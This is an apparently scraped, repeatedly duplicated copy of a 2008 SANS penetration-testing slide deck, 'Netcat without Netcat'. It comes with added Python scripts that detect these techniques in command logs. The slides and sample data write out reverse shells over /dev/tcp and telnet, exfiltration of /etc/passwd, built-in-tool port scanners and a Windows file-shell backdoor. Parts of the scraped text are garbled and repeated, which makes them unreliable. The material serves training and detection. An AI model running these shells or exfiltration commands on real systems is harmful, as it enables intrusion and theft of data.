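            hits.append({"user": user, "host": host, "rules": names, "cmd": cmd})
    return hits


# Constructed sample records: users, hosts and addresses are made up.
SAMPLE_RECORDS = [
    "alice|web01|/bin/bash -i > /dev/tcp/10.0.0.5/4444 0<&1 2>&1",
    "alice|web01|cat /etc/passwd > /dev/tcp/10.0.0.5/9999",
    "bob|db02|port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.7/$port; "
    "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done",
    "bob|db02|telnet 10.0.0.5 8080 | /bin/bash | telnet 10.0.0.5 8081",
    "SYSTEM|ws-17|cmd.exe /c for /L %i in (1,1,1024) do telnet 10.0.0.9 %i",
    "SYSTEM|ws-17|for /L %i in (1,1,1024) do echo open 10.0.0.9 %i > ftp.txt "
    "& echo quit >> ftp.txt & ftp -s:ftp.txt",
    'jsmith|ws-22|for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) '
    "do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1",
    r"jsmith|ws-22|type report.docx > \\fileserv\share\report.docx",
    "alice|web01|grep -r /dev/tcp /var/log/audit",    # benign: no rule matches
    "carol|ws-30|for /L %i in (1,1,5) do echo %i",     # benign: no rule matches
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(f"{hit['host']:6} {hit['user']:7} {','.join(hit['rules'])}: {hit['cmd']}")
```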


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home On-Line: Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 3: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4

Building an Infrastructure for

Ethical Hackingbull Before starting a test you need an

infrastructure including ndash Software

ndash Hardware

ndash Network infrastructure

bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it

ndash But it is a reasonable starting point

ndash Wersquoll focus on software and network stuff

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5

Linux vs Windowsbull Should you concentrate on Linux or Windows Yes

bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them

bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work

ndash Not two different toolboxes but one toolbox with twodifferent compartments

bull Is Mac OS X acceptable

ndash Itrsquos OK but you should have virtual Windows and Linux

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6

Software for Testing ndash

Free Test Tools

bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work

ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml

bull Other free sources of tools

ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc

ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7

Commercial Toolsbull There are numerous useful commercial tools

available for pen testers providing ndash Typically higher quality and more frequent updates

ndash Support ndash very important for professional testing

bull Useful examples include ndash CORE IMPACT ndash OS network services client-side

and web app exploitation

ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan

ndash HP SPI Dynamicsrsquo WebInspect ndash web app

vulnerability discovery and exploit

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8

Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10

What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11

What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12

What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15

Linuxbull devtcp rocks

bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]

ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for

Netcat-like behavior

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16

Linux Command-Line File

Transfer

bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in

bull $ cat etcpasswd gt

devtcp[IPaddr][port]bull Catch it on the other side with a Netcat

listener

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17

Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18

Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
  – Each iteration appends a "Checking Port" line to ports.txt, rewrites ftp.txt, and sends the ftp client's error output (2>>) to ports.txt as well, so the results for each port land next to its marker line


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use the current user's credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action


Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump the output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
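Added example, not from the original deck: detection logic for the process-creation footprint that the telnet-client scanner, the FTP-client port scanner, and the file-shell backdoor above leave on the target. Field names follow Sysmon Event ID 1 (UtcTime, Image, CommandLine, ParentImage); the events, the burst thresholds and the 192.0.2.10 target address are constructed for this example.

```python
"""Spot the Windows "Netcat without Netcat" loops from these slides in
process-creation telemetry.  Added example, not from the original deck;
the events below are constructed, field names follow Sysmon Event ID 1."""
import json
import re
from datetime import datetime

# ftp.exe driven by a command file (ftp -s:ftp.txt): the FTP-client scan loop
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.I)
# "ping -n N 127.0.0.1" is the deck's stand-in for sleep inside a FOR loop
PING_SLEEP = re.compile(r"\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1", re.I)
# cmd.exe /c <something> spawned by cmd.exe: the file shell running a command
CMD_C = re.compile(r"\bcmd(?:\.exe)?\s+/c\s", re.I)

# Constructed telemetry: a benign interactive ftp session (must not fire),
# a telnet scan loop, an ftp -s: scan loop, and a file-shell polling loop
# that executed one command in between its loopback pings.
SAMPLE_LOG = r"""
{"UtcTime":"2008-08-14 10:00:00.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp ftp.example.com","ParentImage":"C:\\Windows\\explorer.exe"}
{"UtcTime":"2008-08-14 10:02:00.000","Image":"C:\\Windows\\System32\\telnet.exe","CommandLine":"telnet 192.0.2.10 21","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:02:01.000","Image":"C:\\Windows\\System32\\telnet.exe","CommandLine":"telnet 192.0.2.10 22","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:02:02.000","Image":"C:\\Windows\\System32\\telnet.exe","CommandLine":"telnet 192.0.2.10 23","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:02:03.000","Image":"C:\\Windows\\System32\\telnet.exe","CommandLine":"telnet 192.0.2.10 24","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:02:04.000","Image":"C:\\Windows\\System32\\telnet.exe","CommandLine":"telnet 192.0.2.10 25","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:05:00.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp -s:ftp.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:05:01.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp -s:ftp.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:05:02.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp -s:ftp.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:05:03.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp -s:ftp.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:05:04.000","Image":"C:\\Windows\\System32\\ftp.exe","CommandLine":"ftp -s:ftp.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:00.000","Image":"C:\\Windows\\System32\\PING.EXE","CommandLine":"ping -n 2 127.0.0.1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:02.000","Image":"C:\\Windows\\System32\\PING.EXE","CommandLine":"ping -n 2 127.0.0.1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:03.000","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c ipconfig","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:04.000","Image":"C:\\Windows\\System32\\PING.EXE","CommandLine":"ping -n 2 127.0.0.1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:06.000","Image":"C:\\Windows\\System32\\PING.EXE","CommandLine":"ping -n 2 127.0.0.1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"UtcTime":"2008-08-14 10:20:08.000","Image":"C:\\Windows\\System32\\PING.EXE","CommandLine":"ping -n 2 127.0.0.1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
"""
SAMPLE_LINES = SAMPLE_LOG.strip().splitlines()


def parse_event(line):
    """Reduce one JSON event to the fields the rules need."""
    d = json.loads(line)
    return {
        "time": datetime.strptime(d["UtcTime"], "%Y-%m-%d %H:%M:%S.%f"),
        "image": d["Image"].rsplit("\\", 1)[-1].lower(),
        "parent": d["ParentImage"].rsplit("\\", 1)[-1].lower(),
        "cmd": d["CommandLine"],
    }


def burst(times, window, threshold):
    """True when at least `threshold` timestamps fall inside `window` seconds."""
    times = sorted(times)
    return any(
        (times[i + threshold - 1] - times[i]).total_seconds() <= window
        for i in range(len(times) - threshold + 1)
    )


def detect(lines, window=60, threshold=5):
    """Return the labels of the loop patterns found in the event lines."""
    events = [parse_event(line) for line in lines if line.strip()]
    from_cmd = [e for e in events if e["parent"] == "cmd.exe"]
    findings = []
    # The FTP client restarted again and again with a script file: the scan loop.
    ftp_times = [e["time"] for e in from_cmd
                 if e["image"] == "ftp.exe" and FTP_SCRIPT.search(e["cmd"])]
    if burst(ftp_times, window, threshold):
        findings.append("ftp-script-port-scan")
    # Many telnet clients in a row from a shell: the telnet scanner.
    telnet_times = [e["time"] for e in from_cmd if e["image"] == "telnet.exe"]
    if burst(telnet_times, window, threshold):
        findings.append("telnet-port-scan")
    # Loopback pings used as a sleep: a FOR loop is polling for something...
    ping_times = [e["time"] for e in from_cmd
                  if e["image"] == "ping.exe" and PING_SLEEP.search(e["cmd"])]
    if burst(ping_times, window, threshold):
        findings.append("ping-sleep-polling-loop")
        # ...and if that loop also spawns cmd.exe /c children, it is the file shell.
        if any(e["image"] == "cmd.exe" and CMD_C.search(e["cmd"]) for e in from_cmd):
            findings.append("file-shell-backdoor")
    return findings


if __name__ == "__main__":
    for label in detect(SAMPLE_LINES):
        print(label)
```

The share-based file transfer above is invisible to this rule set because type and the > redirection run inside the parent cmd.exe; that one shows up on the receiving host's share as a file write, not as a process start.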


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash. DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va. Beach, Strand
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008


Page 5: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5

Linux vs Windowsbull Should you concentrate on Linux or Windows Yes

bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them

bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work

ndash Not two different toolboxes but one toolbox with twodifferent compartments

bull Is Mac OS X acceptable

ndash Itrsquos OK but you should have virtual Windows and Linux

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6

Software for Testing ndash

Free Test Tools

bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work

ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml

bull Other free sources of tools

ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc

ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7

Commercial Toolsbull There are numerous useful commercial tools

available for pen testers providing ndash Typically higher quality and more frequent updates

ndash Support ndash very important for professional testing

bull Useful examples include ndash CORE IMPACT ndash OS network services client-side

and web app exploitation

ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan

ndash HP SPI Dynamicsrsquo WebInspect ndash web app

vulnerability discovery and exploit

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8

Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

What is Netcat?

• Netcat: General-purpose TCP and UDP network widget, running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself put on Standard Error

[Diagram: Netcat sits between The System and The Network – Std In is sent as packets, received packets go to Std Out, and Netcat’s own messages go to Std Err]

What Can Netcat Do for Us?

• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more…

What Is Netcat Without Netcat?

• Netcat without Netcat involves constructing commands that achieve Netcat behavior…
  – …without the use of Netcat
• We’ll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight… from a payphone?
  – Have you ever made a command shell backdoor using Linux’s /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL

Why Netcat without Netcat?

• For penetration testers:
